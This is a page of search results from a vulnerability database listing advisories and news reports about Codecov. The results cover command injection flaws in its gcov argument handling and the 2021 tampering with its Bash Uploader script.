Lucene search
K

67 matches found

PyPA
PyPA
added 2022/07/13 12:15 p.m.4 views

PYSEC-2022-238

This affects the package codecov before 2.0.16. The vulnerability occurs due to not sanitizing gcov arguments before being being provided to the popen method...

6.5CVSS6.9AI score0.00991EPSS
Exploits1References3Affected Software1
OSV
OSV
added 2022/07/13 12:15 p.m.32 views

PYSEC-2022-238

This affects the package codecov before 2.0.16. The vulnerability occurs due to not sanitizing gcov arguments before being being provided to the popen method...

6.5CVSS4.7AI score0.00991EPSS
Exploits1References3
CVE
CVE
added 2022/07/13 11:50 a.m.72 views

CVE-2019-10800

The CVE-2019-10800 issue affects the Python package codecov prior to 2.0.16, caused by inadequate sanitization of gcov arguments before passing them to subprocess popen. Impact is described in connected advisories as a code execution/command invocation risk (details vary by report). Remediation i...

6.5CVSS6.3AI score0.00991EPSS
Exploits1References2Affected Software1
Cvelist
Cvelist
added 2022/07/13 11:50 a.m.28 views

CVE-2019-10800 Command Injection

This affects the package codecov before 2.0.16. The vulnerability occurs due to not sanitizing gcov arguments before being being provided to the popen method...

6.5CVSS6.4AI score0.00991EPSS
Exploits1References2
CNNVD
CNNVD
added 2022/07/13 12:0 a.m.2 views

codecov 参数注入漏洞

codecov is a specialized code coverage solution open-sourced by codecov. A security vulnerability exists in codecov versions prior to 2.0.16, which stems from not cleaning up the gcov parameter before supplying it to the popen method...

6.5CVSS6.5AI score0.00991EPSS
Exploits1References4
Positive Technologies
Positive Technologies
added 2022/07/13 12:0 a.m.4 views

PT-2022-8076 · Codecov +1 · Codecov +1

Name of the Vulnerable Software and Affected Versions: codecov versions prior to 2.0.16 Description: The issue arises from the failure to sanitize gcov arguments before they are provided to the popen method. This lack of sanitization can lead to potential exploitation. Recommendations: For versio...

7.1CVSS6.3AI score0.00991EPSS
Exploits1References16
Github Security Blog
Github Security Blog
added 2022/05/24 5:7 p.m.35 views

Improper Neutralization of Special Elements in Output Used by a Downstream Component in Codecov

Codecov npm module before 3.6.2 allows remote attackers to execute arbitrary commands via the "gcov-args" argument...

8.8CVSS9AI score0.01859EPSS
Exploits1References3Affected Software1
OSV
OSV
added 2022/05/24 5:7 p.m.4 views

GHSA-MH2H-6J8Q-X246 Improper Neutralization of Special Elements in Output Used by a Downstream Component in Codecov

Codecov npm module before 3.6.2 allows remote attackers to execute arbitrary commands via the "gcov-args" argument...

8.8CVSS6.2AI score0.01859EPSS
Exploits1References3
Rapid7 Blog
Rapid7 Blog
added 2021/07/09 8:13 p.m.196 views

Securing the Supply Chain: Lessons Learned from the Codecov Compromise

Supply chain attacks are all the rage these days. While they’re not a new part of the threat landscape, they are growing in popularity among more sophisticated threat actors, and they can create significant system-wide disruption, expense, and loss of confidence across multiple organizations,...

8AI score
Exploits0
The Hacker News
The Hacker News
added 2021/06/18 7:20 a.m.50 views

Google Releases New Framework to Prevent Software Supply Chain Attacks

As software supply chain attacks emerge as a point of concern in the wake of SolarWinds and Codecov security incidents, Google is proposing a solution to ensure the integrity of software packages and prevent unauthorized modifications. Called "Supply chain Levels for Software Artifacts" SLSA, and...

0.1AI score
Exploits0
OSV
OSV
added 2021/05/31 3:39 p.m.6 views

Replacement of bash script by an attacker to one that includes malicious commands in Codecov Bash uploader version All versions downloaded from Jan 2021 through April 2021. Because the attacker had control of the script the version # included in it cannot be trusted.

In Codecov Codecov Bash uploader version All versions downloaded from Jan 2021 through April 2021. Because the attacker had control of the script the version included in it cannot be trusted. a Replacement of bash script by an attacker to one that includes malicious commands exists in the The Bas...

3.6AI score
Exploits0References5
OSV
OSV
added 2021/05/31 3:39 p.m.9 views

GSD-2021-1000009 Replacement of bash script by an attacker to one that includes malicious commands in Codecov Bash uploader version All versions downloaded from Jan 2021 through April 2021. Because the attacker had control of the script the version # included in it cannot be trusted.

In Codecov Codecov Bash uploader version All versions downloaded from Jan 2021 through April 2021. Because the attacker had control of the script the version included in it cannot be trusted. a Replacement of bash script by an attacker to one that includes malicious commands exists in the The Bas...

7.2AI score
Exploits0References5
The Hacker News
The Hacker News
added 2021/05/14 7:2 a.m.40 views

Rapid7 Source Code Breached in Codecov Supply-Chain Attack

Cybersecurity company Rapid7 on Thursday revealed that unidentified actors improperly managed to get hold of a small portion of its source code repositories in the aftermath of the software supply chain compromise targeting Codecov earlier this year. "A small subset of our source code repositorie...

7.3AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2021/05/13 5:5 p.m.106 views

Rapid7’s Response to Codecov Incident

Cybersecurity is Rapid7’s top priority, and when there is an incident that may pose a risk to our customers, we are transparent about it. We also believe that providing this level of transparency ultimately helps the security community better address potential pending threats and safeguard...

0.3AI score
Exploits0
CISA
CISA
added 2021/04/30 12:0 a.m.13 views

Codecov Releases New Detections for Supply Chain Compromise

CISA is aware of a compromise of the Codecov software supply chain in which a malicious threat actor made unauthorized alterations of Codecov’s Bash Uploader script, beginning on January 31, 2021. Upon discovering the compromise on April 1, 2021, Codecov immediately remediated the affected script...

6.7AI score
Exploits0References2
Schneier on Security
Schneier on Security
added 2021/04/21 4:12 p.m.53 views

Backdoor Found in Codecov Bash Uploader

Developers have discovered a backdoor in the Codecov bash uploader. Its been there for four months. We dont know who put it there. Codecov said the breach allowed the attackers to export information stored in its users continuous integration CI environments. This information was then sent to a...

2.4AI score
Exploits0
Malwarebytes
Malwarebytes
added 2021/04/20 8:13 p.m.38 views

CodeCov supply-chain compromise likened to SolarWinds attack

CodeCov, a company that creates software auditing tools for developers, was recently breached the company says it was breached on April 1, and reported it on the April 15. According to investigators, this incident, in turn, gave attackers access to an unknown number of CodeCov’s clients networks...

1.3AI score
Exploits0
Rapid7 Blog
Rapid7 Blog
added 2021/04/16 5:12 p.m.75 views

Codecov Discloses Supply Chain Compromise

The following blog was co-authored by Curt Barnard and Caitlin Condon. On April 15, 2021, code coverage and testing company Codecov announced a supply chain compromise in which a malicious party gained access to their Bash Uploader script and modified it without authorization, enabling the...

0.8AI score
Exploits0
Veracode
Veracode
added 2020/07/21 1:33 a.m.21 views

OS Command Injection

codecov is vulnerable to OS command injection. The vulnerability exists as it was possibly to use backticks "" to bypass the sanitizer. This issue is related to CVE-2020-7597...

9.3CVSS3AI score0.03805EPSS
Exploits2References5Affected Software1
NVD
NVD
added 2020/07/20 6:15 p.m.16 views

CVE-2020-15123

In codecov npm package before version 3.7.1 the upload method has a command injection vulnerability. Clients of the codecov-node library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability. A similar CVE CVE-2020-7597 for GHSA-5q88-cjfq-g2mh was...

9.3CVSS9.6AI score0.03805EPSS
Exploits1References5
Rows per page
Query Builder